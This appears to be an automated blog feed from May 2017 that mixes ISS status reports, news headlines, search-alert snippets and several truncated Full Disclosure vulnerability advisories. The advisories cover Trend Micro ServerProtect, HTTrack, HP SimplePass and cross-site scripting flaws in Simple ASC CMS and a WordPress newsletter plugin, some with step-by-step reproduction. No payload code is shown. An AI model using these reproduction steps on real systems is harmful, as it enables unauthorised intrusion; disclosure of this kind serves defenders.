setup  Stow: ФГБ1ПГО_2_224_1, 0.5 СТВ 1017 (002857J), Soft Container (00044322R) Crewlock Repress Extra Vehicular Activity (EVA) Post-EVA Activities Collecting condensate water samples [КАВ] upstream of СРВ-К2М БКО, sampler replacement Extravehicular Mobility Unit (EMU) Water Recharge Extra Vehicular Activity (EVA) Post-EVA Activities Return to nominal comm configuration after USOS EVA EVA Glove Photo Downlink Extravehicular Activity (EVA) Camera Image Downlink Photo/TV Extravehicular Activity (EVA) GoPro Downlink Photo/TV Extravehicular Activity (EVA) Camera Disassembly External Wireless Instrumentation System (EWIS) Network Control Unit (NCU) Enable MORZE. Closeout Ops KORREKTSIYA. NEUROIMMUNITET. Experiment setup Terminate Soyuz 733 Samsung PC Battery Charge (as necessary) Sampling condensate water [КАВ] upstream of СРВК-2М БКО, removing sampler, equipment disassembly OsteoOmics Saline Kit Relocate Meteor Shutter Open  Completed Task List Items Veg-03 Plant Water/Photo iPad Certificate Verification Grasp Big Picture [from tomorrow’s timeline] Dragon Rendezvous CBT [from tomorrow’s timeline] Dragon Robotics review [from tomorrow’s timeline] Ground Activities All activities were completed unless otherwise noted. System commanding in support of EVA High Beta monitoring Three-Day Look Ahead: Wednesday, 05/24: Dragon OBT Conf, OsteoOmics, Cubesat Deployer Swap, EVA Debrief, Airlock deconfig Thursday, 05/25: Body Measures, OsteoOmics, GRASP, Dragon RoBOT OBT, OGS Sensor R&R Friday, 05/26: OBT Dragon Offset Grapple, EVA loops scrub/conductivity tests, OBT Soyuz drill, GRASP QUICK ISS Status – Environmental Control Group:   Component Status Elektron Off Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off          [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Full up Trace Contaminant Control System (TCCS) Node 3 Off  

from ISS On-Orbit Status Report http://ift.tt/2qOOmgc
via IFTTT

ISS Daily Summary Report – 5/22/2017

External (EXT) Multiplexer/Demultiplexer (MDM)-1 Failure: On Saturday EXT MDM-1 experienced an anomaly. Attempts to recover the MDM remotely were unsuccessful.  Ground Teams configured EXT MDM-2 as primary and set up systems for the next worse failure per established Flight Rules. An IMMT was held Sunday and directed Team 4 to assess the feasibility of performing an Extravehicular Activity (EVA) to remove and replace (R&R) the failed unit. Team 4 recommended an EVA tomorrow, May 23rd.  Today, the crew prepared for the EVA by configuring and auditing EVA Tools, reviewing procedures, performing an Extravehicular Mobility Unit (EMU) Water Recharge, and configuring the Airlock.  Mobile Servicing System (MSS) Operations: Yesterday Robotics Ground Controllers powered up the MSS and maneuvered the Space Station Remote Manipulator System (SSRMS) to perform a video and imagery survey of the Latching End Effector B (LEE-B) snare cables using the P1 Upper Outboard (UPOB) External High Definition Camera (EHDC).  Once the survey was completed the Ground Controllers maneuvered the SSRMS to a park position.  The plan was to walk the SSRMS off Mobile Base System (MBS) Power Data Grapple Fixture 4 (PDGF4) onto the Node 2 PDGF but it was decided to delay this until after the External Multiplexer/Demultiplexer 1 (EXT-MDM 1) EVA.  Radiation Dosimetry Inside ISS-Neutron (RaDI-N): After retrieving the eight Space Bubble Detectors from the Russian crew, the USOS crew deployed the detectors in Node 3 for the Radi-N2 experiment. The Canadian Space Agency’s RaDI-N investigation uses the bubble detectors to measure neutron radiation levels in the ISS. Grip Commissioning:  The crew deployed Grip hardware in the Columbus module central aisle.  With support from a second crew member, they attached a chair on a seat track and the first crewmember performed commissioning tasks in the seated configuration. The Grip investigation tests how the nervous system takes into account the forces due to gravity and inertia when manipulating objects. Results may provide insight into potential hazards for astronauts as they manipulate objects in different gravitational environments, support design and control of haptic interfaces to be used in challenging environments such as space, and provide information about motor control that will be useful for the evaluation and rehabilitation of impaired upper limb control in patients with neurological diseases.   Today’s Planned Activities All activities were completed unless otherwise noted. Personal Data Prep for Return MAG3D Extra Crew time Transfer of Thermal Protection Jackets [ТЗК] from Soyuz 733 Extravehicular Activity (EVA) Reminder for EVA In-Suit Light Exercise (ISLE) Preparation MORZE. SPRUT-2 examination. Specialist conference Inspect [МНР-НС] [СМ-У] connection behind ASU panel 139, [РУ2], [РУ4], [РУ5] behind [ДКиВ] panel 454 and the transparent 5182-03 hose running from [ДКиВ] to [МНР] SPLANH. Photography during the science operation MORZE. Psychophysical examination. adjustment, SENSOR On MCC Go БМП Ф1 absorption cartridge cycling (start) Ultrasound 2 HRF Rack 1 Power On Extravehicular Activity (EVA) Tool Configuring Fluid Shifts Ultrasound 2 Data Export Alternate MATRYOSHKA-R. Memory card prep for return and BUBBLE dosimeter initialization KORREKTSIYA. Liquid and food (medicine) intake parameter logging Radiation Dosimetry Inside ISS-Neutrons Hardware Handover MATRYOSHKA-R. BUBBLE dosimeter handover to USOS Radiation Dosimetry Inside ISS-Neutrons MATRYOSHKA-R. BUBBLE dosimeter initialization and deployment for exposure Fluid Shifts Ultrasound 2 Data Export Alternate Extravehicular Activity (EVA) Procedure Review Pille Sensor prep for USOS EVA SPLANH. [ЭГЭГ] recording term and closeout Specialist conference MORZE. Psychophysical examination. adjustment, SENSOR КАВ sampling from СРВ-К2М down to ФГС using ROS samplers – init ISS Crew departure preparation Metal Oxide (METOX) Regeneration Termination Extravehicular Activity (EVA) Tool Audit. JPM Window Shutter Close Adjusting Кентавр protective suit ISS HAM Service Module Pass Conference of ГПСК specialists with returning crew Robotic Workstation (RWS) Lab Setup KORREKTSIYA. Liquid and food (medicine) intake parameter logging Photo TV GoPro Setup FAGEN. MSK #6 sample fixing and deployment in SM, photography [ОСП] niche and payload container stow under 49S central seat. Refer to comment 7 Extravehicular Mobility Unit (EMU) Water Recharge Extravehicular Activity (EVA) Procedure Conference Extravehicular Activity (EVA) iPad Contingency Procedures preparation FGB interior panel grids vacuuming (panels 201, 301, 401) Delta file prep CSA Generic Frozen Blood Collection Setup Crew Departure Preparations for Return to Earth Equipment Lock (E-LK) Preparation Evening Preparation Work LAB BelAir Wireless Access Point (WAP) Verification ISS HAM Radio Power Down On MCC Go БМП Ф1 absorption cartridge cycling (end) Reminder 1 Fine Motor Skills KORREKTSIYA. Liquid and food (medicine) intake parameter logging Completed Task List Items Extravehicular Mobility Unit (EMU) Swap [Completed GMT 140] PAO EduTECH recorded downlink message [Completed GMT 140] Veggie 03 Pillow Watering and Photo [Completed GMT 140] Cygnus Saffire and Cargo Photo take [Completed GMT 141] EESA PAO items pregather for OA-7 disposal [Completed GMT 141] ESA Active Dosimeter Area Monitoring Mobile Unit Stow [Completed GMT 141] Battery Stowage Assembly (BSA) Operation Termination [Completed GMT 141] Extravehicular Activity (EVA) Airlock Unstow [Completed GMT 141] Battery Stowage Assembly (BSA) Operation Termination [Completed GMT 141] Extravehicular Mobility Unit (EMU) Cuff Checklist Print [Completed GMT 141] Portable Onboard Computers (POC) Dynamic Onboard Ubiquitous Graphics (DOUG) Software Review [Completed GMT 141] US EVA EXT MDM Procedure Review [Completed GMT 141] EVA IDA Cable Stow [Completed GMT 141] EMU Long Life Battery (LLB)/Metal Oxide (METOX) Installation [Completed GMT 141] Extravehicular Mobility Unit (EMU) Long Life Battery (LLB) Terminate [Completed GMT 141] Metal Oxide (METOX) Regeneration Initiation [Completed GMT 141] Rechargeable EVA Battery Assembly (REBA) Powered Hardware Checkout [Completed GMT 141] EVA RET Inspection [Completed GMT 141] Simplified Aid for EVA Rescue GN2 Check [Completed GMT 141] Extravehicular Activity (EVA) Tool Configuring [Completed GMT 141] Google Street View Cupola Photo Operations [Completed GMT 141] HRF Ultrasound 2 Battery install [Completed GMT 141] HRF Ultrasound 2 Remove Swap [Completed GMT 141] JEM Stowage Consolidation Follow-up [Completed GMT 141] USB Jumpdrive Restow at MagVector Front Panel [Completed GMT 141] Optional Microscopy Session [Completed GMT 141] OA-7 Trash Gather [Completed GMT 141] Charging EVA Camera D4 Battery [Completed GMT 141] Photo/TV EVA Camera Configuration [Completed GMT 141] Veggie 03 Pillow Watering and Photo [Completed GMT 141] Ground Activities All activities were completed unless otherwise […]

from ISS On-Orbit Status Report http://ift.tt/2qVA0ZK
via IFTTT

Food Addicts in Recovery Anonymous

Am I a food addict? How to reach for a healthier lifestyle. Jo and John from Food Addicts in Recovery Anonymous joined Angela to share thier stories ...

from Google Alert - anonymous http://ift.tt/2qODC1b
via IFTTT

Microsoft Unveils Special Version of Windows 10 For Chinese Government

China is very strict about censorship, which is why the country has become very paranoid when it comes to adopting foreign technologies. The country banned Microsoft's Windows operating system on government computers in 2014 amid concerns about security and US surveillance. Even in the wake of that, China had been pushing its custom version of Windows XP and its forked version of Ubuntu

from The Hacker News http://ift.tt/2qOr9L0
via IFTTT

It's Insanely Easy to Bypass Samsung Galaxy S8 Iris Scanner with a Photo

Samsung recently launched its new flagship smartphones, the Galaxy S8 and Galaxy S8 Plus, with both Facial and IRIS Recognition features, making it easier for users to unlock their smartphone and signing into websites. We already knew that the Galaxy S8's facial unlock feature could be easily fooled with just a simple photograph of the device owner, but now hackers have also discovered a

from The Hacker News http://ift.tt/2rPdt0U
via IFTTT

Viagra Anonymous

Viagra Anonymous, You won't need to wait in long lines at the pharmacy, because your medications will be delivered directly to your door.

from Google Alert - anonymous http://ift.tt/2qf7Rvx
via IFTTT

Alcoholics Anonymous sues for return of 12-step manuscript

NEW YORK (AP) — Alcoholics Anonymous is demanding the return of its 1939 original manuscript describing the "Twelve Step" program of recovery ...

from Google Alert - anonymous http://ift.tt/2rP2pAS
via IFTTT

NGC 4565: Galaxy on Edge

Is our Galaxy this thin? We believe so. Magnificent spiral galaxy NGC 4565 is viewed edge-on from planet Earth. Also known as the Needle Galaxy for its narrow profile, bright NGC 4565 is a stop on many telescopic tours of the northern sky, in the faint but well-groomed constellation Coma Berenices. This sharp, colorful image reveals the galaxy's bulging central core cut by obscuring dust lanes that lace NGC 4565's thin galactic plane. An assortment of other background galaxies is included in the pretty field of view, with neighboring galaxy NGC 4562 at the upper left. NGC 4565 itself lies about 40 million light-years distant and spans some 100,000 light-years. Easily spotted with small telescopes, sky enthusiasts consider NGC 4565 to be a prominent celestial masterpiece Messier missed. via NASA http://ift.tt/2qS4ZWw

Sterling Silver Alcoholics Anonymous AA Symbol Blue & Black Pendant Jewelry 1030

Sterling Silver Alcoholics Anonymous AA Symbol Blue & Black Pendant Jewelry 1030 in Jewelry & Watches, Fashion Jewelry, Necklaces & Pendants ...

from Google Alert - anonymous http://ift.tt/2q8M7FK
via IFTTT

Orioles recall P Jayson Aquino from Triple-A Norfolk; option P Stefan Crichton (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

singles anonymous 12 step group promoting bonding skills

To "the world," a group like Singles Anonymous seems like a group with a stigma. But it's actually the opposite. Recovery in this program could make a ...

from Google Alert - anonymous http://ift.tt/2qhvYsL
via IFTTT

Ep60 PODCAST | Anonymous sources are NOT the problem

Ep60 PODCAST | Anonymous sources are NOT the problem. Deace; Aired: 5/22/2017. Featured Clips. Play. EP267 | Preview of Tonight's Episode.

from Google Alert - anonymous http://ift.tt/2qMtZjJ
via IFTTT

Masquerade block should exit early for anonymous users

When you're an anonymous user, the Masquerade block can take between 500ms and 1 second to figure out if the anonymous user has access to ...

from Google Alert - anonymous http://ift.tt/2qhzHq7
via IFTTT

anonymous says she slept with a celebrity during the recent pro am, who was it?: hour

You know what anonymous always goes to the threat because that's always saw CN Dicey and fun and arms raised and his demands hey anonymous ...

from Google Alert - anonymous http://ift.tt/2rezoS4
via IFTTT

Ravens: Background playing basketball gives Tyus Bowser more versatility than other pass-rushers - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter

Allen R Brinkman II

Tampa, FL

Following: 14794 - Followers: 16585

May 23, 2017 at 01:54PM via Twitter http://twitter.com/AllenBrinkman

Beware! Subtitle Files Can Hack Your Computer While You're Enjoying Movies

Do you watch movies with subtitles? Just last night, I wanted to watch a French movie, so I searched for English subtitles and downloaded it to my computer. Though that film was excellent, this morning a new research from Checkpoint scared me. I was unaware that a little subtitle file could hand over full control of my computer to hackers, while I was enjoying the movie. Yes, you heard

from The Hacker News http://ift.tt/2q807zn
via IFTTT

[FD] [CORE-2017-0002] - Trend Micro ServerProtect Multiple Vulnerabilities

1. *Advisory Information* Title: Trend Micro ServerProtect Multiple Vulnerabilities Advisory ID: CORE-2017-0002 Advisory URL: http://ift.tt/2rMGpX0 Date published: 2017-05-23 Date of last update: 2017-05-23 Vendors contacted: Trend Micro Release mode: Coordinated release 2. *Vulnerability Information* Class: Cleartext Transmission of Sensitive Information [CWE-319], Insufficient Verification of Data Authenticity [CWE-345], Cross-Site Request Forgery [CWE-352], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], External Control of File Name or Path [CWE-73] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2017-9035, CVE-2017-9034, CVE-2017-9033, CVE-2017-9037, CVE-2017-9032, CVE-2017-9036 3. *Vulnerability Description* Trend Micro's website states that ServerProtect for Linux 3.0 [1] does "Protect against viruses, rootkits, and data-stealing malware while simplifying and automating security operations on servers and storage systems. This reliable solution from the market leader in server security offers real-time protection, high performance, and low processing overhead." Vulnerabilities were found in the ServerProtect for Linux update mechanism, allowing remote code execution as root. We present two vectors to achieve this: one via a man-in-the-middle attack and another one via exploiting vulnerabilities in the Web-based Management Console that is bundled with the product. 4. *Vulnerable Packages* . Trend Micro ServerProtect for Linux 3.0-1061 with SP1 Patch 7 (1.0-1505) Other products and versions might be affected, but they were not tested. 5. *Vendor Information, Solutions and Workarounds* Trend Micro published the following Security Notes: . KB1117411 - http://ift.tt/2rdImid 6. *Credits* These vulnerabilities were discovered and researched by Leandro Barragan and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* Trend Micro ServerProtect for Linux uses an insecure update mechanism that allows an attacker to overwrite sensitive files, including binaries, and achieve remote code execution as root. The vulnerabilities presented in sections 7.1 and 7.2 are the core issue, and would allow an attacker in a man-in-the-middle position to gain root access. Another option exists for when a man-in-the-middle attack is not feasible. The Web-based Management Console includes functionality to specify alternative download sources. By exploiting vulnerabilities 7.3, 7.4, or 7.5, an attacker would be able to set an arbitrary download source and trigger the vulnerable update mechanism. Also, a privilege escalation vulnerability is presented in section 7.6 that allows a local user to run commands as root. This is achieved by abusing a functionality from the Web-based Management Console to set the quarantine directory to an arbitrary location. 7.1. *Insecure Update via HTTP* [CVE-2017-9035] Communication to the update servers is unencrypted. The following request is generated when an administrator launches an update: /--

Source: Gmail -> IFTTT-> Blogger

How can I use 'fmincon'

I want to use the 'fmincon' in simulink matlab function block. And the simulink does not support the anonymous function. And I have several ...

from Google Alert - anonymous http://ift.tt/2rPCatd
via IFTTT

Automatic anonymous switcher for ZhiHu 0.1.0 Compatible with Firefox 57+

On old website UI where the anonymous option is an input select, it automatically toggles the option as the question page opens. The new website ...

from Google Alert - anonymous http://ift.tt/2qRvvRZ
via IFTTT

Hacking Group Arrested For Infecting Over 1 Million Phones With Banking Trojan

The Russian Interior Ministry announced on Monday the arrest of 20 individuals from a major cybercriminal gang that had stolen nearly $900,000 from bank accounts after infecting over one million Android smartphones with a mobile Trojan called "CronBot." Russian Interior Ministry representative Rina Wolf said the arrests were part of a joint effort with Russian IT security firm Group-IB that

from The Hacker News http://ift.tt/2rP7Oa7
via IFTTT

I have a new follower on Twitter

BlueMatrix Media
A digital revolution - Our partners become successful online. Let us Right-Size a win for you. Web Design, SEO, Reputation Management, Social Media Marketing.
Dallas, TX
https://t.co/msYYUCMuR3
Following: 6537 - Followers: 6940

May 23, 2017 at 07:42AM via Twitter http://twitter.com/BlueMatrixMedia

[FD] SEC Consult SA-20170523-0 :: Arbitrary File Upload & Stored XSS in InvoicePlane

SEC Consult Vulnerability Lab Security Advisory < 20170523-0 > ======================================================================= title: Arbitrary File Upload & Stored XSS product: InvoicePlane vulnerable version: 1.4.10 fixed version: 1.5.2 CVE number: - impact: High homepage: http://ift.tt/1jEhnCl found: 2017-04-10 by: Jasveer Singh (Office Kuala Lumpur) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich http://ift.tt/1mGHMNR ======================================================================= Vendor description:

Source: Gmail -> IFTTT-> Blogger

Error accessing page with anonymous user

I've disabled tracking for admin users. If a anonymous user want to view my page this error appears: The website encountered an unexpected error.

from Google Alert - anonymous http://ift.tt/2rNPhuP
via IFTTT

[FD] HTTrack v3.x - Stack Buffer Overflow Vulnerability

Document Title: =============== HTTrack v3.x - Stack Buffer Overflow Vulnerability References (Source): ==================== http://ift.tt/2qNdS3x Release Date: ============= 2017-05-22 Vulnerability Laboratory ID (VL-ID): ==================================== 2068 Common Vulnerability Scoring System: ==================================== 6.1 Vulnerability Class: ==================== Buffer Overflow Product & Service Introduction: =============================== It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system. WinHTTrack is the Windows 2000/XP/Vista/Seven release of HTTrack, and WebHTTrack the Linux/Unix/BSD release. (Copy of the Homepage: http://www.httrack.com/ ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a stack buffer overflow in the official HTTrack v3.48-22-1 (Fedora 25), v3.48-24 (Debian) & v3.49.1 (Windows). Vulnerability Disclosure Timeline: ================================== 2016-05-12: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2016-05-12: Vendor Notification (HTTrack Security Service Team) 2016-05-13: Vendor Response/Feedback (HTTrack Security Service Team) 2017-05-14: Vendor Fix/Patch (HTTrack Service Team) 2017-05-16: Security Acknowledgements (HTTrack Security Service Team) 2017-05-22: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Xavier Roche Product: HTTrack Website Copier - Software (Linux & Windows) 3.48-22-1 (Fedora 25), v3.48-24 (Debian), v3.49.1 (Windows) & Android App Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ A local buffer overflow vulnerability has been discovered in the official HTTrack v3.48-22-1 (Fedora 25), v3.48-24 (Debian) & v3.49.1 (Windows). The vulnerability allows to overwrite the registers of the process to gain higher access privileges for compromise of the local computer system. A buffer overflow in the `URI` and `Project Name` processing in `HTTrack` and `WebHTTrack` on version 3.48-22-1 (Fedora 25) and 3.48-24(Debian), allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large unicode strings. The vulnerability is a classic unicode stack buffer overflow vulnerability in the software core. The vulnerability can be exploited by local attackers with restricted system user privileges to compromise the software process to gain higher process access privileges. The issue allows to overwrite the basic registers of the process like eip and ebx. The security risk of the stack overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.1. Exploitation of the stack buffer overflow vulnerability requires a low privilege or restricted system user account without user interaction. Successful exploitation of the stack overflow vulnerability results in process manipulation or compromise of the affected computer system. Proof of Concept (PoC): ======================= The stack buffer overflow vulnerability can be exploited by local attackers with low privileged system user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Source: Gmail -> IFTTT-> Blogger

[FD] Simple ASC CMS v1.2 - (Guestbook) Persistent Vulnerability

Document Title: =============== Simple ASC CMS v1.2 - (Guestbook) Persistent Vulnerability References (Source): ==================== http://ift.tt/2q1q3gh Release Date: ============= 2017-05-21 Vulnerability Laboratory ID (VL-ID): ==================================== 2072 Common Vulnerability Scoring System: ==================================== 3.8 Vulnerability Class: ==================== Cross Site Scripting - Persistent Product & Service Introduction: =============================== Simple ASC CMS permit to create websites in minutes with its dynamic genaration of news menus links and pages. It use Access Database and is simple to install. There is admin panel where you can manage all features. Provide advanced features as Polls Forum and Guestbook. No need to install third parts components. (COpy of the Homepage: http://ift.tt/2rH0Y7k ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a stored cross site scripting vulnerability in the Simple ASC v1.2 CMS. Vulnerability Disclosure Timeline: ================================== 2017-05-22: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== ASP Source Community Product: Simple ASP - Content Management System (Web-Application) 1.2 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A stored cross site scripting vulnerability has been discovered in the official Simple ASC v1.2 Content Management System. The vulnerability allows remote attackers to inject own malicious script code on application-side to compromise the affected function or module of the online service web-application. The stored cross site scripting vulnerability is located in the `location` input field in the `sign` function of the guestbook. Remote attackers are able to inject own malicious script code via location parameter by a POST method request. The attack vector of the vulnerability is persistent and the request method to inject is POST. The injection point is the vulnerable location input field and the execution point occurs in the guestbook index. The vulnerable and affected files of the guestbook module are `formgb.asp`, `msggb.asp` and `guestbook.asp`. The security risk of the vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. Exploitation of the cross site vulnerability requires no privileged web-application user account and low user interaction. Successful exploitation results in session hijacking, persistent phishings attacks, persistent external redirect and malware loads or persistent manipulation of affected and connected module context. Request Method(s): [+] POST Vulnerable Service(s): [+] Guestbook Vulnerable File(s): [+] formgb.asp [+] msggb.asp Vulnerable Input Field(s): [+] Location Vulnerable Parameter(s): [+] location Affected Module(s): [+] guestbook.asp Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers without privileged user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the web-application 2. Move to the integrated guestbook 3. Click to sign the guestbook 4. Inject the payload to the location input field to the guestbook formgb.asp file 5. Save the entry by a click to sign via POST method 6. The payload executes in the location parameter for all users of the content management system 7. Successful reproduce of the stored cross site scripting vulnerability! PoC: Payload

like it

 

[FD] Wordpress Newsletter Supsystic 1.1.7 - Cross Site Scripting Vulnerability

Document Title: =============== Wordpress Newsletter Supsystic 1.1.7 - Cross Site Scripting Vulnerability References (Source): ==================== http://ift.tt/2pFQeJ2 Release Date: ============= 2017-05-16 Vulnerability Laboratory ID (VL-ID): ==================================== 2070 Common Vulnerability Scoring System: ==================================== 3.2 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Product & Service Introduction: =============================== Newsletter by Supsystic out of box plugin for mail list building, newsletter creation, send and track email campaigns. Drag-and-drop newsletter template builder delights. Build-in mass mail sending and integration with mail services like MailChimp, Aweber, etc. Unlimited subscribers and mails for free. (Copy of the Vendors Wordpress Plugin Page: http://ift.tt/2rcaItt ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a cross site scripting vulnerability in the official Newsletter Plugin by Supsystic for Wordpress. Vulnerability Disclosure Timeline: ================================== 2015-05-16: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Supsystic Product: Newsletter by Supsystic - Wordpress Plugin (Web-Application) 1.1.7 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A stored cross site scripting web vulnerability has been discovered in the official Wordpress Newsletter Plugin by Supsystic v1.1.7. The persistent vulnerability allows remote attackers to inject own malicious script code to the application-side of the module or function. The stored cross site vulnerability is located in the `s` parameter of the `page` module GET method request. Remote attackers are able to inject own malicious script codes to the application-side of the online service web-application to compromise user session information or to permanently manipulate data. The security risk of the cross site web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2. Exploitation of the cross site scripting web vulnerability requires no privileged web-application user account and low user interaction. Successful exploitation results in session hijacking, persistent phishings attacks, persistent external redirect and malware loads or persistent manipulation of affected and connected module context. Request Method(s): [+] GET Vulnerable Service(s): [+] Contentive Theme (Wordpress) Vulnerable Input Field(s): [+] Newsletter Name Vulnerable Parameter(s): [+] ?s= Proof of Concept (PoC): ======================= The remote cross site vulnerability can only be exploited by remote attackers with a privileged web-application user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Payload (Exploitation) Manual steps to reproduce vulnerability ... 1. First go to following url ... Note: http://localhost:8080/wordpress/wp-admin/admin.php?page=newsletters-supsystic&tab=newsletters_add_new 2. Create a new newsletter 3. Include a payload as newsletter name, choose anything from newsletter list or templates section and click save to submit via POST method 4. The payload executes within the list after the malicious content is saved 5. Successful reproduce of the stored cross site scripting vulnerability! Reference(s): http://ift.tt/2rbV3Kr Solution - Fix & Patch: ======================= The vulnerability can be patched by a parse and encode of the vulnerable `newsletter name` value in the webpage POST method request. Encode the parameter and restrict the value input to prevent further script code injection attacks. Parse the output location, were the execution point occurs to prevent exploitation. Security Risk: ============== The security risk of the cross site scripting vulnerability in the wordpress newletter plugin is estimated as medium (CVSS 3.2). Credits & Authors: ================== King Coder - [http://ift.tt/2rbcGcY] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: http://ift.tt/1jnqRwA - http://ift.tt/2oPbqHg - http://ift.tt/1kouTut Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1oSBx0A Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Social: twitter.com/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

18-Byte ImageMagick Hack Could Have Leaked Images From Yahoo Mail Server

After the discovery of a critical vulnerability that could have allowed hackers to view private Yahoo Mail images, Yahoo retired the image-processing library ImageMagick. ImageMagick is an open-source image processing library that lets users resize, scale, crop, watermarking and tweak images. The tool is supported by PHP, Python, Ruby, Perl, C++, and many other programming languages. This

from The Hacker News http://ift.tt/2q5SUA8
via IFTTT

Excel Surveys without requiring Anonymous sharing enabled

Hello team - is there a way to enable excel surveys wihtout allowing users to create anonymous links to content in OneDrive & SharePoint? There is a.

from Google Alert - anonymous http://ift.tt/2qc6D4d
via IFTTT

[FD] Heap overflow in CSEQ header parsing affects Asterisk chan_pjsip and PJSIP

[FD] Asterisk Skinny memory exhaustion vulnerability leads to DoS

[FD] Out of bound memory access in PJSIP multipart parser crashes Asterisk

Email should be a required field for anonymous users

At the moment, the email field for anonymous users is not set as required but has a validation check which it can fail. This works functionality wise, but ...

from Google Alert - anonymous http://ift.tt/2rbtTnh
via IFTTT

Former Ravens S Matt Elam arrested Monday in Florida on charges of larceny and battery (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] HP SimplePass Local Privilege Escalation

# Vulnerability Title: HP SimplePass Local Privilege Escalation # Advisory Release Date: 05/18/2017 # Credit: Discovered By Rehan Ahmed # Contact: knight_rehan@hotmail.com # Severity Level: Medium # Type: Local # Tested Platform: Windows 8 & 10 x64 # Vendor: HP Inc. # Vendor Site: http://www.hp.com # Download Link: http://ift.tt/2qa8kzf # Vulnerable Version: HP SimplePass 8.00.49, 8.00.57, 8.01.46 # Vendor Contacted: 04/03/2017 # Vendor Response: 5/18/2017 ######################################################################################## Summary: ######################################################################################## HP SimplePass allows you to safely store logon information for your favorite websites, and use a single method of authentication for your password-protected website accounts. Choose a fingerprint, password or PIN to authenticate your identity. Your computer must have at least one password-protected Windows User Account to use HP SimplePass. http://ift.tt/2rJqf0L ######################################################################################### Issue Details: ######################################################################################### HP SimplePass is prone to a local privilege-escalation vulnerability due to insecure file system permissions that have been granted during installation. Local adversary can exploit this issue to gain elevated privileges on affected system. HP SimplePass installs by default to "C:\Program Files\Hewlett-Packard\SimplePass" with very weak folder permissions granting any user full permission to the contents of the directory and it's subfolders. This allows ample opportunity for code execution against any other user running the application. HP SimplePass has few binaries which are typically configured as a service or startup program which makes this particularly easy to take leverage.   ########################################################################################## Proof of Concept ########################################################################################## a) C:\>icacls "C:\Program Files\Hewlett-Packard\SimplePass" C:\Program Files\Hewlett-Packard\SimplePass Everyone:(F)                                             Everyone:(OI)(CI)(IO)(F)                                             BUILTIN\Administrators:(I)(F)                                             BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)                                             NT AUTHORITY\SYSTEM:(I)(F)                                             NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)                                             NT AUTHORITY\Authenticated Users:(I)(M)                                             NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)                                             